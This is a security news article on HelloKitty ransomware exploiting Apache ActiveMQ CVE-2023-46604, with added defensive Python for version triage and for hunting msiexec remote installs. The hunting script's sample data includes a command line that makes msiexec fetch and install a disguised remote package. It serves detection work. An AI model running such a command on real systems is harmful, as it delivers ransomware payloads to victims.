
Hello Kitty Ransomware Group Exploiting Apache ActiveMQ Vulnerability


Cybersecurity researchers are warning of suspected exploitation of a recently disclosed critical security flaw in the Apache ActiveMQ open-source message broker service that could result in remote code execution.

“In both instances, the adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations,” cybersecurity firm Rapid7 disclosed in a report published Wednesday.

“Based on the ransom note and available evidence, we attribute the activity to the HelloKitty ransomware family, whose source code was leaked on a forum in early October.”

The intrusions are said to involve the exploitation of CVE-2023-46604, a remote code execution vulnerability in Apache ActiveMQ that allows a threat actor to run arbitrary shell commands.

It’s worth noting that the vulnerability carries a CVSS score of 10.0, indicating maximum severity. It has been addressed in ActiveMQ versions 5.15.16, 5.16.7, 5.17.6, and 5.18.3, released late last month.

The vulnerability affects the following versions –

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16
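The affected-version list above is easiest to act on as a range check against an inventory of broker versions. The following is an added example (not from the article or the Apache project) that encodes exactly those ranges, with the fixed release as the exclusive upper bound of each range, and reports which hosts still need patching. The host names and version strings in the inventory are constructed for illustration.

```python
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int]

# Affected ranges from the advisory, as (lower inclusive, upper exclusive).
# The upper bound of each range is the release that fixes CVE-2023-46604.
BROKER_RANGES: List[Tuple[Version, Version]] = [
    ((5, 18, 0), (5, 18, 3)),
    ((5, 17, 0), (5, 17, 6)),
    ((5, 16, 0), (5, 16, 7)),
    ((0, 0, 0), (5, 15, 16)),   # "Apache ActiveMQ before 5.15.16"
]

# The Legacy OpenWire Module list is identical except that the oldest
# range starts at 5.8.0 rather than covering every earlier release.
LEGACY_OPENWIRE_RANGES: List[Tuple[Version, Version]] = BROKER_RANGES[:3] + [
    ((5, 8, 0), (5, 15, 16)),
]


def parse_version(text: str) -> Version:
    """Parse 'major.minor.patch' into a comparable tuple.

    Anything else (snapshots, vendor suffixes) is rejected rather than guessed,
    so an unparseable version shows up as an error instead of a false negative.
    """
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised ActiveMQ version string: {text!r}")
    major, minor, patch = (int(p) for p in parts)
    return (major, minor, patch)


def fixed_version_for(version: str, legacy_openwire: bool = False) -> Optional[str]:
    """Return the fixed release to move to, or None if the version is not affected."""
    v = parse_version(version)
    ranges = LEGACY_OPENWIRE_RANGES if legacy_openwire else BROKER_RANGES
    for low, high in ranges:
        if low <= v < high:
            return ".".join(str(n) for n in high)
    return None


def is_vulnerable(version: str, legacy_openwire: bool = False) -> bool:
    return fixed_version_for(version, legacy_openwire) is not None


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map each host running an affected broker version to the release it should be updated to."""
    return {
        host: fixed
        for host, ver in inventory.items()
        if (fixed := fixed_version_for(ver)) is not None
    }


if __name__ == "__main__":
    # Constructed inventory (hypothetical hosts and versions).
    inventory = {
        "mq-prod-01": "5.18.2",
        "mq-prod-02": "5.18.3",
        "mq-legacy-01": "5.15.9",
        "mq-dev-01": "5.17.6",
    }
    for host, fixed in triage(inventory).items():
        print(f"{host}: update to {fixed}")
```

Because a version exactly equal to a fixed release falls outside its range (the upper bound is exclusive), 5.18.3 and 5.15.16 are correctly reported as patched, while 5.18.2 and 5.15.15 are not.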

Since the bug’s disclosure, proof-of-concept (PoC) exploit code and additional technical specifics have been made publicly available, with Rapid7 noting that the behavior it observed in the two victim networks is “similar to what we would expect from exploitation of CVE-2023-46604.”

Successful exploitation is followed by the adversary attempting to load remote binaries named M2.png and M4.png using the Windows Installer (msiexec).

Both MSI files contain a 32-bit .NET executable named dllloader that, in turn, loads a Base64-encoded payload called EncDLL that functions akin to ransomware, searching for and terminating a specific set of processes before commencing encryption and appending the “.locked” extension to the encrypted files.
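The post-exploitation step described above (Windows Installer pulling a package from a remote URL whose name does not even end in .msi) is a useful hunting signal on its own, independent of the specific file names. The following is an added example, not from Rapid7’s report, that runs that logic over constructed process-creation events; the event field names, host names, IP address and command lines are assumptions made for the example.

```python
import re
from typing import Dict, List

# Constructed process-creation events in a Sysmon-like shape (hypothetical data).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "mq-01", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /q /i http://203.0.113.10/M2.png"},
    {"host": "mq-01", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Temp\vendor-agent.msi /qn"},
    {"host": "mq-02", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i https://updates.example.test/agent.msi /qn"},
    {"host": "mq-02", "image": r"C:\Program Files\Java\jre\bin\java.exe",
     "cmdline": r"java -jar activemq.jar start"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def classify(event: Dict[str, str]) -> str:
    """Return 'high', 'medium' or 'none' for a single process-creation event.

    medium: msiexec installing a package fetched over HTTP(S) at all.
    high:   the same, where the remote path does not end in .msi, i.e. a
            package disguised under another extension as described in the report.
    """
    if not event["image"].lower().endswith("msiexec.exe"):
        return "none"
    m = URL_RE.search(event["cmdline"])
    if not m:
        return "none"
    path = m.group(0).split("?", 1)[0].lower()
    return "medium" if path.endswith(".msi") else "high"


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per suspicious event, highest severity first."""
    findings = []
    for e in events:
        sev = classify(e)
        if sev != "none":
            findings.append({"host": e["host"], "severity": sev, "cmdline": e["cmdline"]})
    findings.sort(key=lambda f: 0 if f["severity"] == "high" else 1)
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']}: {f['cmdline']}")
```

Running it over the sample events flags the disguised-extension install on mq-01 as high, the ordinary remote .msi install on mq-02 as medium for analyst review, and ignores the local install and the broker process. Pairing these hits with the ActiveMQ broker host list from the version triage keeps the signal focused on the systems the article says were targeted.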

The Shadowserver Foundation said it found 3,326 internet-accessible ActiveMQ instances that are susceptible to CVE-2023-46604 as of November 1, 2023. A majority of the vulnerable servers are located in China, the U.S., Germany, South Korea, and India.

In light of the active exploitation of the flaw, users are advised to update to a fixed version of ActiveMQ as soon as possible and to scan their networks for indicators of compromise.

Update

Cybersecurity company Huntress has also confirmed the HelloKitty ransomware infections, stating “exploitation for this attack is trivial.”

Reference: https://thehackernews.com/2023/11/hellokitty-ransomware-group-exploiting.html?utm_source=dlvr.it&utm_medium=linkedin
